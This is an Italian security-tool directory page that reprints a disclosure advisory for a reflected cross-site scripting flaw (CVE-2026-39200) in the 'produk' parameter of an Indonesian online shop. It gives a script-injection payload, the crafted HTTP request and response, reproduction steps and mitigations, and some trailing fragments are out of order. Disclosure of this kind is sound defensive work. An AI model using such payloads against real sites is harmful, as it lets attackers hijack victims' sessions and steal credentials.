Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-39200 — Il valore del parametro di richiesta produk viene copiato nel valore di un attributo di un tag HTML racchiuso tra virgolette doppie. Il payload xbnw0"><script>alert(1)</script>skc2h è stato inviato nel parametro produk. Questo input è stato restituito come xbnw0\"><script>alert(1)</script>skc2h nella risposta dell'applicazione. | Kitploit
Strumenti/GitHubGitHub/r00tali/cve-2026-39200
Analisi delle VulnerabilitàSfruttamento di Applicazioni WebSicurezza WebPenetration TestingPaper e RicercaApprendimento e Formazione
GitHubr00tali/cve-2026-39200

CVE-2026-39200

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

1 mese faNon ancora revisionato

Il valore del parametro di richiesta produk viene copiato nel valore di un attributo di un tag HTML racchiuso tra virgolette doppie. Il payload xbnw0"><script>alert(1)</script>skc2h è stato inviato nel parametro produk. Questo input è stato restituito come xbnw0\"><script>alert(1)</script>skc2h nella risposta dell'applicazione.

Condividi

CVE-2026-39200 — Cross-Site Scripting (XSS) Riflesso in Toko Online RotI

Riepilogo

Una vulnerabilità di Cross-Site Scripting (XSS) riflesso è stata identificata nel parametro della richiesta produk dell'applicazione web Toko Online RotI. L'applicazione non codifica in HTML l'input fornito dall'utente prima di rifletterlo all'interno di un attributo di un tag HTML racchiuso tra virgolette doppie. Un attaccante può creare un URL malevolo che, quando visitato da una vittima, esegue JavaScript arbitrario nel contesto della sessione del browser della vittima.

CampoValore
ID CVECVE-2026-39200
Tipo di vulnerabilitàCWE-79 — Neutralizzazione impropria dell'input durante la generazione di pagine web (XSS riflesso)
Prodotto interessatoToko Online RotI (negozio online indonesiano)
Parametro interessatoproduk
ScopritoreUzair Ali (r00tali) — Penetration Tester / Cacciatore di Bug / Ricercatore di Sicurezza
Data di scoperta2026-07-03
CVE assegnato2026-07-12
Avviso pubblicato2026-07-19

Dettagli sulla vulnerabilità

Il parametro della richiesta produk viene copiato letteralmente nel valore di un attributo di un tag HTML racchiuso tra virgolette doppie. Poiché l'applicazione non codifica in HTML l'input fornito dall'utente prima di rifletterlo, un attaccante può uscire dall'attributo inviando un payload che contiene una virgoletta doppia di chiusura seguita da un payload HTML/JavaScript.

Payload di prova del concetto

root@kitploit:~
xbnw0"><script>alert(1)</script>skc2h

Quando questo payload viene inviato come parametro produk, l'applicazione restituisce l'input nella risposta non escapato. La sequenza di chiusura "> termina l'attributo originale, e il blocco iniettato <script>alert(1)</script> viene interpretato dal browser come un nuovo elemento HTML, eseguendo JavaScript arbitrario nella sessione dell'utente.

Pattern vulnerabile (concettuale)

La risposta HTML vulnerabile si presenta così:

root@kitploit:~
<!-- PRIMA dell'iniezione -->
<input type="text" name="produk" value="USER_INPUT" />

<!-- DOPO l'iniezione con payload xbnw0"><script>alert(1)</script>skc2h -->
<input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
                                                            ^^^^^^^^^^^^^^^^^^^^^^^^
                                                            Il browser esegue questo

Richiesta HTTP (riproduzione)

root@kitploit:~
GET /[endpoint-vulnerabile]?produk=xbnw0%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Eskc2h HTTP/1.1
Host: [host-target]
User-Agent: Mozilla/5.0

Risposta HTTP (estratto)

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<html>
  <body>
    <!-- ... -->
    <input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
    <!-- ... -->
  </body>
</html>

Passi per la riproduzione

  1. Identificare un endpoint nell'applicazione Toko Online RotI che riflette il parametro produk all'interno di un attributo HTML (ad esempio, una pagina di ricerca, dettaglio o filtro di un prodotto).
  2. Sostituire il valore del parametro produk con il seguente payload:
    root@kitploit:~
    xbnw0"><script>alert(1)</script>skc2h
    
  3. Inviare la richiesta al server.
  4. Ispezionare la risposta del server. Il payload viene restituito senza modifiche all'interno dell'attributo, uscendo dal " e producendo un elemento <script> valido nel DOM.
  5. Caricare la risposta modificata in qualsiasi browser moderno. Viene visualizzata una finestra di dialogo JavaScript alert(1), confermando l'esecuzione di JavaScript arbitrario nella sessione della vittima.

Impatto

Un exploit riuscito di questo XSS riflesso consente a un attaccante di:

  • Rubare cookie di sessione e token di autenticazione, portando al furto dell'account.
  • Eseguire azioni per conto di utenti autenticati senza la loro conoscenza.
  • Reindirizzare gli utenti a siti dannosi (phishing / raccolta di credenziali).
  • Iniettare contenuti dannosi nell'applicazione (defacement).
  • Catturare le sequenze di tasti e i dati dei moduli inviati dalla vittima.
  • Sfruttare le vulnerabilità del browser per la distribuzione di malware drive-by.
  • Abusare del rapporto di fiducia tra l'utente e il dominio dell'applicazione.

Poiché la vulnerabilità è riflessa, lo sfruttamento richiede solo che una vittima clicchi su un link appositamente creato, rendendo questo banalmente utilizzabile in campagne di phishing.

CVSS v3.1 (stimato): 6.1 (Medio) — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N


Mitigazione

Per mitigare questa vulnerabilità, il venditore dovrebbe:

  1. Codificare in HTML tutti i valori forniti dall'utente prima che vengano riflessi nell'output HTML. In particolare codificare <, >, ", ', e & (ad es., &lt;, &gt;, &quot;, &#x27;, &amp;).
  2. Utilizzare gli helper di codifica dell'output integrati nel framework piuttosto che la concatenazione manuale. Esempi:
    • PHP: htmlspecialchars($input, ENT_QUOTES, 'UTF-8')
    • ASP.NET: HttpUtility.HtmlEncode(input) o sintassi <%: %>
    • Python (Jinja2): {{ input }} (auto-escaping predefinito)

Cronologia della divulgazione

DataEvento
2026-07-03Vulnerabilità scoperta durante test di sicurezza autorizzati
2026-07-03Richiesto ID CVE a MITRE tramite cveform.mitre.org
2026-07-12CVE-2026-39200 assegnato dal team di assegnazione MITRE

Scopritore

Uzair Ali (r00tali) — Penetration Tester / Cacciatore di Bug / Ricercatore di Sicurezza

  • GitHub: https://github.com/r00tali

Riferimenti

  • OWASP — Cross-Site Scripting (XSS)
  • CWE-79: Neutralizzazione impropria dell'input durante la generazione di pagine web
  • PortSwigger — XSS Riflesso
  • Record CVE MITRE — CVE-2026-39200

Dichiarazione di non responsabilità

Questo avviso è pubblicato solo a scopi educativi e difensivi. La vulnerabilità è stata segnalata attraverso il processo di divulgazione responsabile tramite il team di assegnazione CVE di MITRE. Non vengono divulgate informazioni riservate del venditore, dati dei clienti o codice proprietario. Il proof-of-concept utilizza un payload benigno alert(1) ed è inteso a dimostrare l'esistenza del bug, non a facilitare attacchi contro il servizio live.

Scarica lo strumento
  • Impostare un'intestazione di risposta Content-Security-Policy (CSP) rigorosa per limitare l'impatto di eventuali iniezioni residue:
    root@kitploit:~
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
    
  • Impostare i flag HttpOnly e Secure su tutti i cookie di sessione per impedire a JavaScript di leggerli.
  • Validare il parametro produk rispetto a una lista consentita di identificatori di prodotto attesi (ID numerici, slug, ecc.) e rifiutare tutto ciò che non corrisponde.
  • Aggiungere X-Content-Type-Options: nosniff per prevenire lo sniffing del tipo MIME dei corpi delle risposte.
  • 2026-07-19
    Avviso pubblico pubblicato